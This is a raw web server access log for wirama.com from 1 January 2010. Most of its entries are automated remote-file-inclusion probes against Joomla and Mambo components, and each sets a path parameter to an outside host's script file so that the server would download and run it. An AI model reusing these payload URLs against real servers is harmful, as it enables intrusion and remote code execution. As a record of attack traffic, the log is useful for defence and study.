64.151.247.1 - - [01/Jan/2010:04:32:17 -0800] "GET /logs/access_090329.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
189.72.61.206 - - [01/Jan/2010:04:32:41 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:04:32:44 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:04:32:45 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:04:32:45 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.72.61.206 - - [01/Jan/2010:04:32:48 -0800] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.daemyung-eng.co.kr//bbs/files/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:32:53 -0800] "GET /logs/access_090329.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:34:38 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:34:38 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:34:38 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /logs/access_090501.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /logs/access_090501.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:52 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:34:56 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:09 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:09 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:09 -0800] "GET /logs/access_090330.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:11 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:11 -0800] "GET /logs/access_090330.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:35:11 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:35:38 -0800] "GET /logs/access_090329.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [01/Jan/2010:04:37:53 -0800] "GET /components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:37:53 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:37:53 -0800] "GET /logs/access_090901.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:37:54 -0800] "GET /logs/access_090731.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:37:55 -0800] "GET /logs/access_090329.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.108.239.1 - - [01/Jan/2010:04:38:08 -0800] "GET /components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:38:12 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:38:12 -0800] "GET /logs/access_090731.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:38:13 -0800] "GET /logs/access_090501.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:38:23 -0800] "GET /logs/access_090901.log//components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:38:24 -0800] "GET /logs/access_090329.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.55.143.249 - - [01/Jan/2010:04:38:47 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
72.55.143.249 - - [01/Jan/2010:04:38:49 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.fce.unam.edu.ar/investigaciones/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:39:42 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:39:42 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:39:42 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:40:15 -0800] "GET /logs/access_090731.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:40:15 -0800] "GET /components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:40:15 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
94.45.33.18 - - [01/Jan/2010:04:40:50 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 1638400 "http://www.wirama.com/logs/access_090329.log" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:40:54 -0800] "GET /logs/access_090701.log%20//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:04:41:28 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:04:41:28 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.62.128.254 - - [01/Jan/2010:04:41:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:41:52 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.116.32.13 - - [01/Jan/2010:04:41:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.116.32.13 - - [01/Jan/2010:04:41:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.62.128.254 - - [01/Jan/2010:04:42:37 -0800] "GET /logs/access_091101.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:44:06 -0800] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:44:06 -0800] "GET /logs/access_090501.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:44:06 -0800] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:44:12 -0800] "GET /logs/access_090331.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:05 -0800] "GET /logs/access_090731.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:05 -0800] "GET /components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:05 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:10 -0800] "GET /components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:10 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:10 -0800] "GET /logs/access_090731.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:04:45:16 -0800] "GET /logs/access_090501.log//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:46:10 -0800] "GET /logs/access_090330.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:37 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:49 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:46:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:47:35 -0800] "GET /logs/access_090329.log%20%20//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
142.150.1.9 - - [01/Jan/2010:04:50:18 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:04:50:18 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
142.150.1.9 - - [01/Jan/2010:04:50:18 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://nuthome.net/bbs/data/manual/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.227.82.174 - - [01/Jan/2010:04:50:28 -0800] "GET /logs/access_090731.log%20%20//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [01/Jan/2010:04:50:29 -0800] "GET /logs//components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.227.82.174 - - [01/Jan/2010:04:50:29 -0800] "GET /components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
64.151.247.1 - - [01/Jan/2010:04:51:15 -0800] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:51:15 -0800] "GET /components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.nahongku.com/zBoard/skin/daerew_45galleryGD//lag.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:52:00 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:52:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
82.116.32.13 - - [01/Jan/2010:04:52:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:04 -0800] "GET /logs/access_091101.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:04 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:04 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.45 - - [01/Jan/2010:04:54:32 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:36 -0800] "GET /pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:36 -0800] "GET /logs//pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:36 -0800] "GET /logs/access_090901.log//pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:37 -0800] "GET /logs//pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:37 -0800] "GET /pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
67.108.239.1 - - [01/Jan/2010:04:54:37 -0800] "GET /logs/access_090901.log//pda/pda_projects.php?offset=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:54:44 -0800] "GET /logs/access_090330.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:51 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:51 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.147.237 - - [01/Jan/2010:04:54:52 -0800] "GET /logs/access_090801.log%20%20//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
110.45.147.237 - - [01/Jan/2010:04:55:45 -0800] "GET /logs/access_090601.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.chefartsmith.net/cms//administrator/.../id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
64.151.247.1 - - [01/Jan/2010:04:56:08 -0800] "GET /logs/access_090329.log//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:56:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:56:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:56:48 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:57:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:57:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
67.222.129.18 - - [01/Jan/2010:04:57:15 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
65.55.207.45 - - [01/Jan/2010:04:58:13 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:29 -0800] "GET /logs/access_090601.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
69.94.125.100 - - [01/Jan/2010:04:58:29 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://vrim.org/bbs//script/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
